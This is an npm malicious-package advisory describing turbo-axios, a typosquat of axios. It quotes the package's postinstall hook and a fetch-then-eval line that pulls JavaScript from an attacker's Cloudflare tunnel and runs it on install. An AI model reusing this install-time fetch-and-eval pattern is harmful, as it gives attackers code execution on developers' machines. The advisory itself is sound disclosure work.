npm · Malicious package advisory
Malwareturbo-axios
MAL-2026-4695
Malicious code in turbo-axios (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (62503451ade68043379968f3dc4784fdb66424d55422854514e3ba1b10058324)
turbo-axios is a typosquat of the popular axios HTTP client (it re-exports the full axios API and reuses axios's repository/homepage metadata in package.json) carrying an install-time remote code execution payload. package.json declares `"postinstall": "node./lib/core/eval.js"`. lib/core/eval.js performs `fetch('https://consequences-faces-weblogs-clinical.trycloudflare.com/download/datab1')` and then `await eval(`(async () => {\n${datab2}\n})();`)`, executing the response body as JavaScript inside an async IIFE. The destination is an anonymous, mutable Cloudflare quick-tunnel — not the publisher's infrastructure — and the fetched bytes are not pinned, hashed, or otherwise verified, so the attacker can ship arbitrary code to every installer at any time. The exfil/RCE function is misleadingly named `sendAnalytics`. Any `npm install turbo-axios` results in attacker-controlled code execution on the installer's machine with the privileges of the npm process.
Compromised versions (2)
- 1.17.2
- 1.17.3
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.